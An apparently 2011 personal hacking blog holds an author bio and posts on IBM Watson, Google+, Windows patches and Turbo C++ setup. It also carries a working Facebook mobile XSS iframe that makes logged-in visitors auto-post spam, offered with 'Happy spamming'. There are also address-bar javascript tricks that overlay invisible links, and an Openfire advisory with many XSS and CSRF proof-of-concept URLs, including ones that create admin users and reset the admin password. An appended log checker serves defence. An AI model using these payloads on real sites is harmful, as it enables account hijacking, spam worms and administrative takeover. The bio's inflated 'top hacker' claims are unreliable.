
Author

Amol Bhure (ultra l33t) was born in Maharashtra, Seventh July Of Nineteen Hundred Nineteen Ninety A.D. He's currently pursuing his B.E. in Bangalore. He is a cyber security professional, hacker, designer and programmer with a keen interest in hacking and network security, and he has developed several techniques of defending and defacing websites. He's of the opinion that people should learn this art to prevent any cyber attacks. Currently Amol works as a member of 'Null International', Bangalore chapter, as a network security guy. Apart from this, he has done internships at YAHOO! India, AMAZON India, etc. He has also attended various international conferences like NullCon GOA, c0c0n, ClubHack, Defcon, SecurityByte, ICFoCS, OWASP, etc. He is certified with RHCE, LPT, CEH v7, SCJP and AFCEH. In programming he knows C, C++, C#, JAVA (SCJP), .NET and PHP. Additionally he knows a few hardware languages like HDL, VHDL, Verilog, and embedded microcontroller programming. He has been featured on the Google hall of fame. Amol was named an "India's top 10 hacker" by Google. "World's top 50 hacking blog" by Google.


Tuesday, August 23, 2011

Watson Computers : Next Generation of Computer



Watson is an artificial intelligence computer system, developed by IBM, capable of answering questions posed in natural language.
What is Watson: Follow the story of the development of Watson from a modest DeepQA machine to a formidable Jeopardy! contestant. Watch the videos below to see how Watson represents a leap forward in data analytics and how this technology will impact business and industry.







The Science Behind an Answer....
The challenge in building a computer system like Watson lies in developing its ability to understand the language of a clue, register the intent of a question, scour millions of lines of human language, and return a single, precise answer - in less than three seconds.
Find out what is going on inside the Watson mainframe to accomplish this feat.
“We all want to know the right answers to questions. And it isn't the same thing as searching for possibilities or options, which we do everyday.”









Why Jeopardy!?...
The game of Jeopardy! makes great demands on its players – from the range of topical knowledge covered to the nuances in language employed in the clues.
Can the analytical power of a computer system – normally accustomed to executing precise requests – overcome these obstacles?
Can the troves of knowledge written in human terms become easily searchable by a machine in order to deliver a single, precise answer?
Can a quiz show help advance science?
“IBM is not in the entertainment business. But we are in the business of technology and pushing frontiers.”



A System Designed for Answers....
Operating on a single CPU, it could take Watson two hours to answer a single question.
A typical Jeopardy! contestant can accomplish this feat in less than three seconds.
For Watson to rival the speed of its human competitors in delivering a single, precise answer to a question requires custom algorithms, terabytes of storage and thousands of POWER7 computing cores working in a massively parallel system.
Watch to find out how building smarter systems like Watson involves optimizing hardware and software into a solution greater than the sum of its parts.
“The POWER7 system is tuned for very rapid deep analytics of massively parallel problems.”







The Next Grand Challenge...
Over the last century, IBM has reached numerous scientific breakthroughs through its commitment to research and its tradition of Grand Challenges.
These Grand Challenges work to push science in ways that weren’t thought possible before.
Jeopardy! The IBM Challenge poses a specific question with very real business implications:
Can a system be designed that applies advanced data management and analytics to natural language in order to uncover a single, reliable insight — in a fraction of a second?
“We look at areas where there's an enormous gap in current capability and use that as a challenge. We call them Grand Challenges.”





Preparing Watson for the Jeopardy! stage posed a unique challenge to the team: how to represent a system of 90 servers and hundreds of custom algorithms for the viewing public.
The result? A dynamic visual avatar based on the smarter planet icon. A speaking voice that clearly pronounces a vast vocabulary. And an answer panel that reveals the system’s top responses and confidence levels. Watch the video to find out more about each of these elements.






Watson was optimized to tackle a specific challenge: competing against the world’s best Jeopardy! contestants. 
Beyond Jeopardy!, the IBM team is working to deploy this technology across industries such as healthcare, finance and customer service.





After competing against the two greatest Jeopardy! champions of all time, the technology behind Watson will now be applied to some of the world’s most enticing challenges.
Watch the video for a breakdown of the match from the IBM team members as they look toward the future. 
Ken Jennings and Brad Rutter also weigh in about the accomplishment.








Monday, August 22, 2011

All Important Things About Google+


This isn’t every single thing there is to know about Google+. That could probably be a book rather than an article, and the Google+ Project has only just begun. If Google has its way, it will live on for years. Or it could go the Google Wave route. It’s just too early to tell.
Do you think Google+ will succeed?
While we’ll no doubt learn plenty more about Google+ as time goes on, here are some quick nuggets to get you a little more acquainted with it.


  1. Google+ is currently available on an invitation-only basis.
  2. Google does not consider it a Facebook competitor (at least publicly).
  3. Google+ is currently available for download as an app in the Android Market.
  4. When you download that app, it splits off the “Huddle” feature as a separate app.
  5. Users can post status updates, and these appear on the Google Profile under a tab called “Posts”. The +1’s and Buzz tabs remain separate. I have to wonder if we’ll see Buzz and Posts merge eventually.
  6. What is available now is “just the beginning” according to Google. These are just the first features of presumably many more to come.
  7. Circles is one current feature. It lets you share things with different people (kind of like Facebook Groups) but with a very different user interface.
  8. Another feature is Sparks. This looks for videos and articles it thinks you’ll like, so “when you’re free, there’s always something to watch, read, and share.”
  9. Hangouts is another feature. It’s basically group video chat. Google describes it as “the unplanned meet-up.”
  10. Instant uploads is a mobile-specific feature. Photos upload themselves as you take them, and are stored in a private area on the cloud.
  11. Huddle is another group-conversation feature for mobile. Essentially, it’s group chat.
  12. The Stream
    1. The stream is basically the equivalent of the Facebook news feed.
    2. When you share something with Google+ it’s added to your stream and the stream of everyone you shared with.
    3. The stream shows you what all of your Circles have shared with you.
    4. If you mention a user, using the “+” or “@” symbols, the person may receive a notification that you mentioned them.
    5. You can see who specific posts were shared with in the stream – whether they were shared publicly, to extended circles, or a limited group.
    6. You can filter the stream by specific Circles.
    7. You can chat directly in the stream.
    8. You can report inappropriate content.
    9. You can search for people from the search box at the top of the stream.
    10. Soon, Google says you’ll be able to search the stream itself from the search box.
    11. If you leave comments on a post, you can edit or delete them.
    12. The same goes for posts, but you can’t edit a post’s sharing settings after the post has been shared. However, you can delete the post and share again to different circles.
    13. You can “reshare” posts made by others (like retweeting).
    14. You can “mute” a post. This will let you stop receiving updates from a post, like if the comments get out of control for example.
    The Google Social Network
    1. You can use the “Google+ Bar” that appears at the top of various Google products as your connection to the social network.
    2. When you’re signed in you’ll see your full name or email address displayed with a photo or avatar next to it, to help you identify which account you’re currently signed in to.
    3. If you’ve enabled multi sign-in you can sign in to two different Google accounts and switch between them using the Google+ bar.
    4. When you sign up for Google+, you’re also signing up for Picasa Web Albums, so all photos and videos uploaded to Google+ (including from your phone via Instant Upload) will also be available in Picasa Web Albums.
    5. You can use the Google +1 button from the stream.
    6. You can have a ton of friends on Google+. Robert Scoble quickly added over 1,000.
    7. The central user interface is very Facebook-esque.
    8. Google+ quickly became the butt of a lot of jokes (and even cartoons), but has also received a great deal of praise thus far.
    9. With Google+, Google adds a “You” link to the recently redesigned (painted black) navigation bar across Google properties.
    10. You can view public Google+ content without actually being invited (Danny Sullivan has a guide on how to view it).
    11. China is already blocking Google+. That didn’t take long.
    12. Invitations have been listed on eBay.
    13. There are already privacy concerns about Google+ but the Privacy Guide can be found here.
    14. According to the Financial Times article, you can share something within a closed “Circle,” but someone from that circle can then reshare it with anyone, and even make it public.
    15. Is Google+ destined to bring real competition to Facebook or will the hype fade? Share your thoughts here in the comment box.
    16. thank u :)

Hi friends, after a long break I am back...

I got a few messages from known and unknown people regarding G+, so I'm going to post a few important things about Google Plus (G+). Enjoy :)

Saturday, May 21, 2011

Run Linux In Web Browser Using JavaScript

Ever wanted to try out UNIX commands without actually installing the Linux operating system? Well, say thanks to the Javascript Guru Fabrice Bellard who’s solved the problem for you. Now you can emulate the entire Linux based PC right in your browser without needing to install the operating system. The solution is perfect for those who are curious to learn UNIX commands and have a better understanding of how the command line interface works but do not have direct access to a Linux system.














Fabrice claims that he created the PC emulator just for fun. He wanted to try his hand at something ‘a little more challenging’. He says that the most modern versions of Javascript are fast enough and capable of doing complicated tasks. His emulator can be used to benchmark Javascript engines or for client-side processing using an x86 library. A more advanced version of the emulator could be used to run DOS-based PC software and play old DOS games.

Friday, May 6, 2011

Custom Tag on Facebook Comment





A couple of months ago, Facebook added a new function that enables users to tag their friends in the comment system. By default you can do that simply by typing @ followed by any letter, and a list of your friends with that particular letter will show up. But how about creating a custom tag for your friend's name? For example, if you have a friend named John, you can tag John with another name, for example Amol. Interesting, right? You can play more with this trick, for example make your comment fully clickable to your own fan page, etc. Just be more creative.
With this trick, you can even tag people who are not friends with you, as long as you have their Facebook ID. OK, let’s show you how to do this. Simply write your comment in this format:


@@[0:[facebook id:0:tag name]]


Facebook ID is the unique id identifying every Facebook profile. You can read how to get the Facebook ID in this post: How To Find Facebook ID
    Tag Name is your custom text. This way you can link to your friend's Facebook profile but with whatever text you want.


    example:
    @@[0:[100001884789734:0:dont no who is he]] Your comment is here

    With this code, you can tag my profile (Amol Bhure) but with (dont no who is he) as the anchor text. Preview :


      Cool, isn’t it? Please note that if it doesn't show as it should (the tag is not clickable or not in the blue colored format), you need to refresh the page, and it will show you what you want to see.
      That’s all, happy connecting with Facebook :)


      Thursday, April 28, 2011







      If you are an admin of a Facebook fan page or a Facebook application page, you can find the Suggest to Friends link on the bottom left of the page for an application page, while for a fan page you can find it on the top right of your page. You can easily click the link to suggest your page to your friends. But the problem is, when you are not an admin of a certain page, you can't find the link on that page. It was not like this before: Suggest to Friends was actually an Invite Friends link on the old version of a fan page/application page. Anyone could invite their friends at that time even when they were not the admin.
      Now it’s a little bit hard to suggest a Facebook page to your friends when you're not the admin. Many people ask how to show the Facebook Suggest to Friends dialog. Well, we can use a javascript address bar hack to show the dialog. Using this simple code, the dialog will show whenever you click on any part of the page. The link is overlaid transparently in front of the page. Here is the script:


      javascript:(function(){x=$('content').innerHTML;y=x.indexOf('_id');y=x.substring(y+4,y+27);x=y.substring(0,y.indexOf('"'));y=document.createElement('div');y.style.cssText='position:fixed;z-index:9;height:100%;';y.innerHTML='<a rel="dialog-post" href="http://amol-hackinglibrary.blogspot.com/" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&node_id='+x+'" class="UIImageBlock_Content" style="color:transparent;height:10000px">ultral33t amol</a>';z=document.getElementsByTagName('div')[0];z.parentNode.insertBefore(y,z);alert('Now click anywhere on this page, suggest page dialog will show – ultral33t amol');})()







      1. Copy the code above
      2. Go to the page you want to suggest, for example : Facebook GIF Animated Application
      3. Paste the code on the address bar
      4. Then press enter
      5. An alert will show, just click OK or press enter
      6. Click anywhere on that page, the Facebook Suggest to Friends Dialog will show

      HOW TO FIND FACEBOOK ID.











      What is a Facebook ID? It’s a unique number identifying a Facebook profile, Facebook group or fan page. You can see it in a Facebook profile URL; here’s an example for the Facebook Bold Text profile URL:
      http://www.facebook.com/profile.php?id=139701732734451


      See the URL above: 139701732734451 is the Facebook ID. We will discuss how to get the ID. Below are some javascript address bar tricks you can use to find a Facebook ID. You can get your own Facebook ID, your friends' Facebook IDs, or Facebook group/fan page IDs programmatically.

      To find your own Facebook ID, simply put this code in the address bar then press enter:

      javascript:alert('Your ultral33t amol Facebook ID : '+Env['user'])




      For a friend's Facebook ID, or a Facebook group/fan page ID, simply go to the destination profile, then paste the code in the address bar. You can use one of these codes:


      1. If your profile or your friend's/Facebook page's profile has a profile picture, not the default silhouette one, use this:


      javascript:x=$('profile_pic').src;y=x.substr(x.indexOf('_')+1);alert('ultral33t amol Facebook ID : '+y.substr(0,y.indexOf('_')))


      2. This one uses the Facebook share link: we get the link, then get the profile ID programmatically. You can use this if you can see the share link on the profile page. Here’s the code:


      javascript:x=$('content').getElementsByTagName('a');for(i=0;i<x.length;i++)if(x[i].href.indexOf('[]')>1){y=x[i].href;alert('ultral33t amol Facebook ID : '+y.substr(y.indexOf('[]')+3));break};void(0)


      3. And this one uses xhpc_targetid, one of the form elements for sending a message to the destination wall. You can use this if you can post to the destination profile:


      javascript:x=document.forms;for(i=0;i<x.length;i++){if(document.forms[i].xhpc_targetid){alert('Facebook ID : '+document.forms[i].xhpc_targetid.value);break}};void(0)



      There are lots more tricks to see a Facebook ID, but we can't discuss them all here, because some people are copying data and using it for unwanted things. amol: please don't copy. Some of the examples above will be enough for you to get the ID.
      Happy tweaking :):)

      @amol


      Friday, April 15, 2011

      Autopost Spamming using Facebook Mobile XSS



      @amol: What has happened out there really pushes me to share this out. I call this Autopost Spamming using Facebook Mobile XSS. I don't care anymore if this one will be filtered; the faster they fix it, the better. People don't seem to care how hard I tried to hide this code from the Facebook team. Frankly, I also use this to post spam with a link to this blog, but it only affects Indonesian IPs, with a custom interval. So people outside Indonesia won't be able to see this. Too bad it has now spread like a worm everywhere, wide open without any source code protection.
      Never mind, it’s no use complaining about what has happened anyway. Let’s talk about this in detail. This is about how to make an autopost status update to people’s Facebook profiles. This method uses an XSS vulnerability of prompt_feed.php from m.facebook.com. When people see our page with this evil code, they will automatically post a status update with any message we want.
      Below is the iframe HTML source code :


      <iframe id="amol-hackinglibrary" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Just visited http://tinyurl.com/ultral33t-amol Wow.. amol cool! nice page dude!!!';document.forms[0].submit();}</script>"></iframe>


      Put the code above on your website, change the red code with your own message. Whenever facebook logged in users see your page the message will be posted automatically to their wall.
      That’s all. Happy spamming :(


      @mol



      Sunday, March 20, 2011

      Windows 7 Service Pack 1

      The release of the first service pack for Windows 7 is going to meet user demands. The pack released by Microsoft aims at addressing OS nips and tucks. It is readily available for download. Security updates and bug fixes come with it. In most cases, they will appear on your screen as Windows updates. In case you want to be the first to enjoy it, you can get it as a free download from the Microsoft web site. You can also get it through Windows Update. If the above methods are not convenient for you, you can install it on your system from a DVD containing the full pack.



      The installation process is well outlined for you on the Microsoft website. Installing the software takes a short time and gives you a safe and reliable program to work with. Several changes have come with SP1. After installing the program, you will be able to make audio adjustment for HDMI by use of the bug. In most cases these services fail to work due to frequent restarting of the computer. Your prints are going to be clear and use of one format in the production. After restoring folders you will be able to access them at their original place. In most cases, once you restore deleted folders they appear in cascading order. This is not the case once you have installed SP1 on your machine.
      For enterprise users, it is not always necessary to use Service Pack 1 to install the final version of Internet Explorer 9. If you do not have this pack, you can rely on the services of IE9. It helps you in installing additional operating systems that are in the first pack. Many computer owners enjoy a wide range of services offered by Windows 7 since it also has a backup system. This reduces the work of having it on an external hard drive.

      Windows 8 Remains a Mystery as Microsoft Anticipates Surging Market Demands

      Microsoft has always had surprises for its customers. They have a very special trend for software development. It is quite difficult to anticipate what they will roll out whenever they announce such a move. For example, the upgrade of Windows 1.0 to Windows 7 came as a surprise to many.





      A close look at the development of the Windows brand of software reveals that Microsoft is dynamic. Some customers still complain about the compatibility of the Windows operating system with other computer applications but, truth be told, Windows is a great brand. Recently, the corporation unveiled Windows 7, which ideally is an upgrade of Windows version 1.0. This displays the corporation's intent to solve the compatibility issues that most users of the former version have pointed out.
      What Microsoft is doing is laudable; it is a mechanism of identifying the pitfalls and shortcomings of its applications in an attempt to better its software to meet the current demands of the market. The world is going technological, if it has not already done so. The Chief Executive Officer of the corporation, Mr. Steve Ballmer, hinted that Windows is undergoing evolution. It is in doubt whether this will interfere with the release of the chain of the operating system.
      The CEO intimated that the software would undergo massive changes in the future that will make it look very different from the way it does today. Currently, the software works just fine. In fact, it is the most common software and the best so far. It is very easy to use and manipulate towards the performance of different tasks.
      Currently, Microsoft is working on Windows 8. The corporation has not disclosed the features of the software yet. From the words of the CEO, we can anticipate a unique product that encompasses major improvements over the previous operating systems and that meets the current requirements of the market.

      Microsoft, Mozilla, Adobe and Foxit Bugs and Their Critical Patches


      Several software companies are releasing a whole range of patches and quick fixes for all the little bugs that are appearing on their laptops and PCs. Although Microsoft has reached a record one patch for the most recent cycle, this patch proves to be a pretty important one considering that it will fix a bug that allows online hackers to steal information and possibly take over your computer once you view a compromised website.
      This patch basically attempts to resolve the errors in Internet Explorer 5 for Windows 2000; Internet Explorer 6 for Windows XP; and Internet Explorer 7 for Windows Vista and XP. It seems like this may also affect Internet Explorer 8, although it has not been necessary for the more robust version that came out with Windows 7. All of these patches are readily available online and can be obtained by simply running Windows Update on your PC.
      Microsoft
      There are also two patches that are being released to fix a bug that could possibly assist in eliciting a PC attack through MS Office’s MS Excel and MS Word compromised files. One of the most vulnerable versions of Office to this kind of hit is Office 2000 because once the attacker is able to get into the system, he can implement any command at his bidding. Other versions that may be susceptible are the Office XP version as well as Office 2003 and Office 2007, as well as the 2004 and 2008 versions created for the Mac.
      Microsoft Works is also undergoing some problems which Microsoft also needs to resolve, specifically for MS Works converters and files for the Office versions 2000, XP, 2003 and 2007. This is also required for the Microsoft versions of 9 and 8.5.
      The Windows Printer Spool is another area infected with bugs, giving those using Windows 2000 a way into a system that is not firewall protected. If an attack were to be successful on a Windows 2000 version, it would only pose moderate threats to other Windows versions. Although Microsoft has released some patches, these fixes are only there to fix lesser problems compared to those mentioned that need immediate attention.
      Mozilla
      After the release of Firefox 3.5 by the Mozilla group in mid-2009, not having this version may open you up to some threats. If you still have Firefox 3.0, then the least you should do is to get the latest 3.0 update. This Firefox 3.0 fix responds to at least four crucial bugs that have appeared in Javascript, three of which impinge on the SeaMonkey Suite and two that compromise the Thunderbird email application. To get these updates, go to the Help section of Firefox and click on the Check for Updates option to be sure that you are using the Firefox 3.0.11 version or at least the 1.1.17 version of SeaMonkey and 2.0.0.22 version of Thunderbird.
      Adobe
      As for Adobe, the problem is in the Shockwave Player version 11.5.0.596 or any earlier version of it. Some websites have manipulated Adobe Director files that would allow an attacker to take over your PC and have full control over it. The best remedy to this, as suggested by Adobe, is to install the latest version of Shockwave Player and completely uninstall the older version, at least just to get you out of harm’s way.
      Some effective updates have been released for the Reader and Acrobat (versions 9.1.2 or 7.1.3 or 8.1.6). This update prevents any loopholes for a PC takeover even if you have a compromised PDF file. The best way to get the update is to go to Help, click on Check for Updates and check if you have the latest version of Reader and Acrobat. This update is now available for Unix, Macintosh, and Windows systems.
      Foxit
      For those using the Foxit Reader PDF application, you may need to get a patch by going to Help and clicking on About Foxit Reader and making sure that you at least have Foxit Reader 3.0 build 1817 on your computer. Without the latest version, there will be a threat to your JPEG2000/JBIG2 Decoder add-ons and the Foxit Reader 3.0 base program. You can easily download the latest version of Foxit Reader online. To find out about your add-ons, go to the Help option and then Check for Updates. This will at least get the add-on updates, but will not update your Foxit Reader version, so do that separately.

      How to install Turbo C++ on Windows 7 64bit

      A few days ago we posted an article about installing Turbo C++ on 32-bit Windows 7. Now we are providing a step-by-step procedure for installing Turbo C++ on 64-bit Windows 7.
      1. Install the software DOSBox ver 0.73 :
      2. Create a folder, for example "Turbo" (c:\Turbo\)
      3. Download and extract TC into the Turbo folder (c:\Turbo\):
      http://blog.bestsoftware4download.com/goto/http://s1.freedownloadme.info/turboc_installed.zip 
      4. Run the DOSBox 0.73 from the icon located on the desktop




      5. Type the following command at the command prompt [Z]: mount d c:\Turbo\ [The folder TC is present inside the folder Turbo]
      Now you should get a message which says: Drive D is mounted as a local directory c:\Turbo\



      6. Type d: to shift to d:



      7. Next follow the commands below:
      cd tc
      cd bin
      tc or tc.exe [This starts Turbo C++ 3.0]


      8. In Turbo C++ go to Options>Directories> Change the source of TC to the source directory [D] ( i.e. virtual D: refers to original c:\Turbo\ . So make the path change to something like D:\TC\include and D:\TC\lib respectively )

      How to start TurboC++ in the DOSBox automatically:

      You can save yourself some time by having DOSBox automatically mount your folders and start TurboC++:
      For DOSBox versions older than 0.73, browse into the program installation folder and open the dosbox.conf file in any text editor. For version 0.73, go to the Start Menu and click on “Configuration” and then “Edit Configuration“. Then scroll down to the very end, and add the lines which you want to automatically execute when DOSBox starts.
      Automatically mount and start Turbo C++3.0 in DOSBox ver 0.73:


      Scroll down to the very end, and add the lines:


      Those commands will be executed automatically when DOSBox starts!
      Please note:
      Full screen: Alt and Enter
      When you exit from DOSBox [precisely, when you unmount the virtual drive where Turbo C++ 3.0 has been mounted], all the files you have saved or changed in Turbo C++ 3.0 will be copied into the source directory (the directory which contains the TC folder).
      Don’t use shortcut keys to perform operations in TC because they might be shortcut keys for DOSBox as well. E.g.: Ctrl+F9 will exit DOSBox rather than run the code.


      Saturday, February 19, 2011

      Multiple XSS and XSRF issues in Openfire 3.6.4

      I recently (read: last month) disclosed several security issues with Ignite Realtime's Openfire v3.6.4. The following links are the original advisory postings and the exploit code:
      http://www.securityfocus.com/bid/45682
      http://secunia.com/advisories/42799
      http://packetstormsecurity.org/files/author/8144/
      http://www.exploit-db.com/exploits/15918/

      The following is the condensed disclosure document for the vulnerabilities:
      Title: Multiple XSS and CSRF Vulnerabilities in Openfire 3.6.4 Administrative Section
      --------------------------------------------------------------------

      Project: Openfire
      Severity: High
      Versions: 3.6.4 (other versions may be affected)
      Exploit type: Multiple XSS and CSRF
      Fixes Available: None
      --------------------------------------------------------------------

      Timeline:
      14 October 2010: Vendor Contacted
      15 October 2010: Vendor Response received. Asks to verify the issues in beta.
      28 October 2010: Informed Vendor that multiple pages are still vulnerable
      03 November 2010: Acknowledgement / Update requested
      03 November 2010: Update received. No fixes initiated.
      23 November 2010: Informed vendor disclosure date set to 1/12/2010
      22 December 2010: Update requested.
      22 December 2010: Vendor asks to release information as the vulnerabilities are already known
      23 December 2010: A different contact at the Vendor location informs that there are no updates.
      24 December 2010: Disclosure date set to 5 January 2011
      05 January 2011: Disclosed to the Security Community via Bugtraq, Full disclosure and Secunia
      --------------------------------------------------------------------

      Product Description:
      Openfire is a real time collaboration (RTC) server licensed under the Open Source GPL. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Openfire is incredibly easy to setup and administer, but offers rock-solid security and performance.
      (Source: http://www.igniterealtime.org/projects/openfire/)
      --------------------------------------------------------------------

      Affected Files/Locations/Modules:
      XSS:
      login.jsp
      security-audit-viewer.jsp
      user-create.jsp
      plugins/search/advance-user-search.jsp
      user-roster-add.jsp
      user-roster.jsp
      group-create.jsp
      group-edit.jsp
      group-delete.jsp
      muc-room-edit-form.jsp
      muc-room-delete.jsp
      plugins/clientcontrol/create-bookmark.jsp
      plugins/clientcontrol/spark-form.jsp

      CSRF:
      user-create.jsp
      user-password.jsp
      user-delete.jsp
      group-create.jsp
      group-edit.jsp
      group-delete.jsp

      ---------------------------------------------------------------------

      Vulnerability Details:
      A user can insert HTML or execute arbitrary JavaScript code within the vulnerable application. The vulnerabilities arise due to insufficient input validation in multiple input fields throughout the application.
      Successful exploitation of these vulnerabilities could result in, but is not limited to, compromise of the application, theft of cookie-based authentication credentials, arbitrary URL redirection, disclosure or modification of sensitive data, and phishing attacks.

      Since the vulnerabilities exist in the administrative module, a successful attack could cause a complete compromise of the entire application.

      An attacker can also force a user into executing functions that add/delete/modify users and groups without the knowledge of the user.
      ----------------------------------------------------------------------

      Proof of Concept:
      Persistent XSS:
      http://target-url/login.jsp?url=&username=test" onfocus=javascript:window.location.assign('http://www.google.com');">

      http://target-url/login.jsp?url=hello" onfocus=javascript:window.location.assign('http://www.google.com');">

      http://target-url/security-audit-viewer.jsp?range=15&username="><script>alert('xss')</script>&search=Search

      http://target-url/user-create.jsp?username=test"><script>alert('xss')</script>
      http://target-url/user-create.jsp?name=test"><script>alert('xss')</script>
      http://target-url/user-create.jsp?email=test"><script>alert('xss')</script>

      http://target-url/plugins/search/advance-user-search.jsp?criteria=test"><script>alert('xss')</script>

      http://target-url/user-roster-add.jsp?username=test<script>alert('xss')</script>
      http://target-url/user-roster-add.jsp?username=user&jid=1&nickname=<script>alert('XSS')</script>&email=<script>alert('XSS')</script>&add=Add+Item

      http://target-url/user-roster.jsp?username=test<script>alert(document.cookie)</script>
      http://target-url/user-lockout.jsp?username=test<script>alert('xss')</script>

      http://target-url/group-create.jsp?name=test<script>alert('xss')</script>&description=<script>alert('xss')</script>&create=Create+Group

      http://target-url/group-edit.jsp?creategroupsuccess=true&group=test<script>alert('xss')</script>

      http://target-url/group-delete.jsp?group=<script>alert('xss')</script>


      http://target-url/muc-room-edit-form.jsp?save=true&create="><script>alert('XSS')</script>&roomconfig_persistentroom="><script>alert('XSS')</script>&roomName=23&mucName=conference&roomconfig_roomname=<script>alert('XSS')</script>&roomconfig_roomdesc=<script>alert('XSS')</script>&room_topic=<script>alert('XSS')</script>&roomconfig_maxusers="><script>alert('XSS')</script>&roomconfig_presencebroadcast=<script>alert('XSS')</script>true&roomconfig_presencebroadcast2="><script>alert('XSS')</script>&roomconfig_presencebroadcast3=true"><script>alert('XSS')</script>&roomconfig_roomsecret="><script>alert('XSS')</script>&roomconfig_roomsecret2="><script>alert('XSS')</script>&roomconfig_whois=moderator"><script>alert('XSS')</script>&roomconfig_publicroom=true"><script>alert('XSS')</script>&roomconfig_canchangenick=true"><script>alert('XSS')</script>&roomconfig_registration=true"><script>alert('XSS')</script>&Submit=Save+Changes

      http://target-url/muc-room-delete.jsp?roomJID="><script>alert('XSS')</script>&create=false

      http://target-url/plugins/clientcontrol/create-bookmark.jsp?urlName="><script>alert('XSS')</script>&url="><script>alert('XSS')</script>&users="><script>alert('XSS')</script>&groups="><script>alert('XSS')</script>&rss=off&createURLBookmark=Create&type=url

      http://target-url/plugins/clientcontrol/spark-form.jsp?optionalMessage=</textarea><script>alert('XSS')</script>&submit=Update+Spark+Versions


      Stored XSS:
      http://target-url/group-create.jsp
      http://target-url/group-summary.jsp
      Method: Navigate to http://target-url/group-create.jsp, and create a new group with the following details.
      Group Name: Test<script>alert("xss")</script>
      Description: Test<script>alert("xss")</script>
      Click on Create Group, you will be greeted with multiple alert boxes. Click on Group Summary from the left pane or navigate to http://target-url/group-summary.jsp to be greeted again by multiple alert boxes completing the PoC.


      CSRF:
      For the following links, create HTML pages with image tags whose src is set to the following links and ask the user to view these pages. If a user is logged into Openfire's admin console and the HTML pages are viewed, then the respective functions are called:
      http://target-url/user-create.jsp?username=tester&name=Riyaz&email=walikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin=on&create=Create+User
      http://target-url/user-password.jsp?username=admin&password=secure-pass&passwordConfirm=secure-pass&update=Update+Password
      http://target-url/user-delete.jsp?username=tester&delete=Delete+User
      http://target-url/group-create.jsp?name=NewGroup&description=New+Group&create=Create+Group
      http://target-url/group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add
      http://target-url/group-edit.jsp?group=NewGroup&admin=abc@example.com&updateMember=Update
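
A defender-side check for the pages and parameters listed in the advisory above, as an added example that is not part of the original advisory or of Openfire's code: it flags admin-console requests whose parameters carry markup and GET requests to the CSRF-affected pages that arrive with a cross-site or missing Referer. The log format, the console host name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Pages the advisory lists under CSRF (each performs an add/delete/modify action).
CSRF_PAGES = {"user-create.jsp", "user-password.jsp", "user-delete.jsp",
              "group-create.jsp", "group-edit.jsp", "group-delete.jsp"}
# Markup that has no place in an admin-console parameter value.
MARKUP = re.compile(r"""[<>"]|\bon\w+\s*=|javascript:""", re.I)
# Assumed log format: ... "METHOD target HTTP/x" status size "referer"
LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
                  r'\d{3} \S+ "(?P<referer>[^"]*)"')
CONSOLE = "openfire.example.test:9090"  # hypothetical admin-console host

def analyze(line, console_host=CONSOLE):
    """Return the findings (possibly none) for one access-log line."""
    m = LINE.search(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    page = url.path.rsplit("/", 1)[-1]
    params = parse_qsl(url.query, keep_blank_values=True)  # percent-decoded
    findings = []
    tainted = [name for name, value in params if MARKUP.search(value)]
    if tainted:
        findings.append(f"markup in parameter(s) {','.join(tainted)} of {page}")
    if m["method"] == "GET" and page in CSRF_PAGES and params:
        referer_host = urlsplit(m["referer"]).netloc
        if referer_host != console_host:  # cross-site or missing Referer
            findings.append(f"state-changing GET to {page} "
                            f"with referer host {referer_host or 'none'}")
    return findings

SAMPLE = [  # constructed log lines, not captured traffic
    '10.0.0.5 - - [05/Jan/2011:10:00:01 +0000] "GET /user-create.jsp?username=tester&isadmin=on&create=Create+User HTTP/1.1" 200 5120 "http://forum.example.test/thread/7"',
    '10.0.0.5 - - [05/Jan/2011:10:00:09 +0000] "GET /group-delete.jsp?group=%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1" 200 4096 "-"',
    '10.0.0.5 - - [05/Jan/2011:10:01:30 +0000] "GET /group-summary.jsp HTTP/1.1" 200 9000 "http://openfire.example.test:9090/group-create.jsp"',
    '10.0.0.5 - - [05/Jan/2011:10:02:10 +0000] "GET /group-edit.jsp?group=NewGroup HTTP/1.1" 200 7000 "http://openfire.example.test:9090/group-summary.jsp"',
]

if __name__ == "__main__":
    for number, entry in enumerate(SAMPLE, 1):
        for finding in analyze(entry):
            print(f"line {number}: {finding}")
```

The Referer test is a heuristic: clients that strip the header will be flagged as well, so treat those hits as leads to review rather than confirmed forgeries.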

      Tuesday, February 1, 2011

      Free XSS flaws detection service..!!

      Cross-site scripting (XSS) errors are responsible for more than half of all web application vulnerabilities. So, in this age of accountability and expectations for secure, high quality software, what’s being done about it?

      Veracode announced their Free XSS Detection Service which empowers global developers and security professionals to quickly and easily identify dangerous and costly XSS vulnerabilities, while offering remediation recommendations to produce higher security web applications.

      OWASP includes XSS on its list of the Top 10 most dangerous software risks, and despite the high prevalence, Veracode is certain that XSS vulnerabilities can be easily eliminated once detected.

      Veracode Free XSS Detection Service removes perceived complexity from the detection process, and with access to proper education and training, developers can avoid introducing the flaws into software in the first place.

      According to OWASP, XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser that can hijack user sessions, deface web sites, or redirect the user to malicious sites.

      Here’s how the Veracode Free XSS Detection Service works:

          * Sign up for a Free XSS Detection Service account
          * Users submit one Java application, free of charge
          * The Veracode platform will search for XSS errors and produce a detailed report with location and remediation information
          * Participants will also receive complimentary access to Veracode’s dedicated XSS eLearning courses.

      “At Veracode, we see thousands — sometimes tens of thousands — of XSS vulnerabilities a week. Many are those we describe as ‘trivial’ and can be fixed with a single line of code. Some of our customers upload a new build the following day; others never do. Motivation is clearly a factor,” said Chris Eng, senior director of security research, Veracode.

      “Think about the XSS vulnerabilities that hit highly visible websites such as Facebook, Twitter, MySpace and others. Sometimes those companies push XSS fixes to production in a matter of hours. Are their developers really that much better? Of course not. The difference is how seriously the business takes it. When they believe it’s important, you can bet it gets fixed.”

      @mol

      New malware strains wreaking havoc on Facebook..!!






